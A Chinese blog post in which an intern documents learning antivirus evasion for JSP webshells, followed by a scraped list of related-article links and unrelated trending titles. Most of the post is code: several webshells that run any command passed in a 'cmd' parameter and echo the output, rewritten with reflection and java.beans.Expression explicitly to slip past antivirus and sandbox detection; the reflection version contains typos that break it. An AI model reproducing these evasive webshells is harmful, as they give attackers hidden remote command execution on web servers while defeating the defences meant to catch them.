好搞笑,我身边的人省护期间天天提到许少,听说是一个很厉害的大佬。

结果我免杀跟着学的视频就是这位大佬的。

更离谱的是,聪哥说我们是见过许少的,就是上次给红队整理报告的时候,他就在。

果然,实习就是好,传说中的大佬们就在身边——虽然我都不认识,但是还是感觉好厉害。

来吧,开始学习免杀

首先,什么是webshell?

webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,主要用于网站管理、服务器管理、权限管理等操作。使用方法简单,只需上传一个代码文件,通过网址访问,便可进行很多日常操作,极大地方便了使用者对网站和服务器的管理。

什么是RCE?

RCE英文全称:remote command/code execute
分为远程命令执行ping和远程代码执行evel。
漏洞出现的原因:没有在输入口做输入处理。

先做到基本的反射

首先就是最简单的一句话木马:

<%@ page language="java" pageEncoding="UTF-8" %>

<%

Runtime.getRuntime().exec(request.getParameter("cmd"));

%>

太容易被发现了

而且在我写代码的时候电脑的病毒和威胁防护就已经开始反应了

现在将这一句话木马,分开来写

<%@ page language="java" pageEncoding="UTF-8" %>

<%

String cmd =request.getParameter("cmd");

Runtime.getRuntime().exec(cmd);

%>

沙箱是通过了✌

但是cmd=ipconfig是什么都不出的,netstat -ano也是。

再次修改代码

<%@ page import="java.io.InputStream" %>

<%@ page import="java.io.InputStreamReader" %>

<%@ page import="java.io.BufferedReader" %>

<%@ page language="java" pageEncoding="UTF-8" %>

<%

String cmd =request.getParameter("cmd");

Process process = Runtime.getRuntime().exec(cmd);

InputStream in = process.getInputStream();

InputStreamReader reader = new InputStreamReader(in);

BufferedReader input = new BufferedReader(reader);

String s = null;

response.getWriter().print("<pre>");

while ((s = input.readLine())!=null){

response.getWriter().println(s);

}

response.getWriter().print("</pre>");

%>

中间出了个小插曲,

我一直看不出来代码为什么报错,结果找了半天竟然是因为getWrite少了个r。

但是这只完成了可回显,还没有反射的功能

<%@ page import="java.io.InputStream" %>

<%@ page import="java.io.InputStreamReader" %>

<%@ page import="java.io.BufferedReader" %>

<%@ page import="java.lang.reflect.Method" %>

<%@ page language="java" pageEncoding="UTF-8" %>

<%

String cmd =request.getParameter("cmd");

Class<?> rt = Class.forName("java.lang.getRuntime");

Methond grMethod = rt.getMethod("getRuntime");

Methond method = rt.getMethod("exec",String.class);

Object object = method.invoke(grMethod.invoke(null),cmd);

Process process = (Process)object;

InputStream in = process.getInputStream();

InputStreamReader reader = new InputStreamReader(in);

BufferedReader input = new BufferedReader(reader);

String s = null;

response.getWriter().print("<pre>");

while ((s = input.readLine())!=null){

response.getWriter().println(s);

}

response.getWriter().print("</pre>");

%>

BeansExpression的免杀

<%@ page import="java.io.InputStream" %>

<%@ page import="java.io.InputStreamReader" %>

<%@ page import="java.io.BufferedReader" %>

<%@ page import="java.beans.Expression" %>

<%@ page language="java" pageEncoding="UTF-8" %>

<%

String cmd =request.getParameter("cmd");

Expression expr = new Expression(Runtime.getRuntime(),"exec",new Object[]{cmd});

Process process = (Process) expr.getValue();

InputStream in = process.getInputStream();

StringBuilder sb = new StringBuilder();

response.getWriter().print("<pre>");

InputStreamReader resultReader = new InputStreamReader(in);

BufferedReader stdInput = new BufferedReader(resultReader);

String s = null;

while ((s = stdInput.readLine())!=null){

sb.append(s).append("\n");

}

response.getWriter().print(sb.toString());

response.getWriter().print("</pre>");

%>

JSP webshell免杀——webshell免杀相关推荐

  1. ASP WebShell 后门脚本与免杀

    随着时间的推移和其它新型动态网页技术的兴起,使用ASP(Active Server Page)技术构建的Web应用越来越少.ASP的衰落.旧资料和链接的失效.前辈们早期对ASP较多的研究,都导致了新型 ...

  2. shell 免杀aspx_asp免杀webshell木马总结

    0x00 前言 asp免杀webshell木马总结 简单的介绍下asp的免杀,相对于php我们的asp还是不够灵活. 0x01 目录 数组 函数 加密 注释符 类 字符串操作 0x02 了解asp一句 ...

  3. php网站安全狗绕过,绕过网站安全狗拦截,上传Webshell技巧总结 | 附免杀PHP一句话...

    原标题:绕过网站安全狗拦截,上传Webshell技巧总结 | 附免杀PHP一句话 *本文原创作者:1_2,本文属FreeBuf原创奖励计划,未经许可禁止转载 这篇文章我介绍一下我所知道的绕过网站安全狗 ...

  4. Web安全之:WebShell的获取与查杀

    0x00 什么是webshell 攻击者以asp.php.jsp等网页文件形式保存在Web服务器上的一种命令执行环境,也可称为网页后门. 攻击者使用浏览器访问webshell,得到一个命令执行环境,以 ...

  5. 远控免杀5---Veil免杀

    0x01 免杀能力一览表 1.下表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了Bypass. 2.为了更好的对比效果,大部分测试payload均使用msf的windows/meterpert ...

  6. 远控免杀4---Evasion免杀

    0x01 免杀能力一览表 1.下表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了Bypass. 2.为了更好的对比效果,大部分测试payload均使用msf的windows/meterpert ...

  7. 远控免杀专题(9)-Avet免杀(VT免杀率14/71)

    本专题文章导航 1.远控免杀专题(1)-基础篇:https://mp.weixin.qq.com/s/3LZ_cj2gDC1bQATxqBfweg 2.远控免杀专题(2)-msfvenom隐藏的参数: ...

  8. 远控免杀专题(16)-Unicorn免杀(VT免杀率29/56)

    声明:文中所涉及的技术.思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 本专题文章导航 1.远控免杀专题(1)-基础篇:https://mp.w ...

  9. 远控免杀专题(12)-Green-Hat-Suite免杀(VT免杀率23/70)

    声明:文中所涉及的技术.思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 本专题文章导航 1.远控免杀专题(1)-基础篇:https://mp.w ...

  10. Atitit.木马 病毒 免杀 技术 360免杀 杀毒软件免杀 原理与原则 attilax 总结...

    Atitit.木马 病毒 免杀 技术 360免杀 杀毒软件免杀 原理与原则 attilax 总结 1. ,免杀技术的用途2 1.1. 病毒木马的编写2 1.2. 软件保护所用的加密产品(比如壳)中,有 ...

最新文章

  1. Python-OpenCV 处理视频(四): 运动检测
  2. CRM Fiori offline技术实现:index.html under CRM.www folder
  3. 以下python注释代码格式正确的是_Python文件头注释的含义,你肯定不懂
  4. SVN的安装笔记和要注意的问题
  5. php网页执行流程,PHP程序的执行流程
  6. C下的全局变量和指针 - C/C++ / C语言
  7. 使用pytesseract识别简单验证码
  8. bash 别名_必不可少的Bash别名
  9. 马云再谈教育:未来的学校学的不仅仅是知识 更重要的是学习的能力
  10. 全新iPhone“Pro”命名要实锤:新增配色是“原谅色”本色吧?
  11. centos7安装Nginx 配置及反向代理
  12. 自动化测试学习之路--HTML常见元素、属性的简单学习
  13. Java JDK 10:下一代 Java 有哪些新特性?
  14. QIIME 2教程. 22命令行界面q2cli(2021.2)
  15. 五人表决器课程设计单片机c语言,五人表决器电路设计方案汇总(五款模拟电路逻辑图及原理图详解)...
  16. 实验四:大数据可视化工具—pyecharts
  17. Ubuntu联网图标消失
  18. 非线性薛定谔方程_现有光纤网络正被推向极限,未来怎么办?薛定谔波动方程来帮忙...
  19. 回文数五位和六位c语言,特殊回文数
  20. 3 继续测试一下 esp_tunnel 用 racoon协商 用setkey设置 spd

热门文章

  1. 基金净值(某几个基金净值)
  2. FTP-用户名密码明文传输
  3. Zynq UltraScale+ A53 Linux+R5裸机
  4. python timeit.timer_Python timeit
  5. Linux-01-配置克隆机
  6. 简单三步,实现LINUX 下虚拟光驱
  7. 使用免费虚拟主机安装苹果cms
  8. web漏洞之越权漏洞
  9. 使用TXT导出文件夹下所有文件名!
  10. 小程序、公众号商城(vue、php)从小白学起;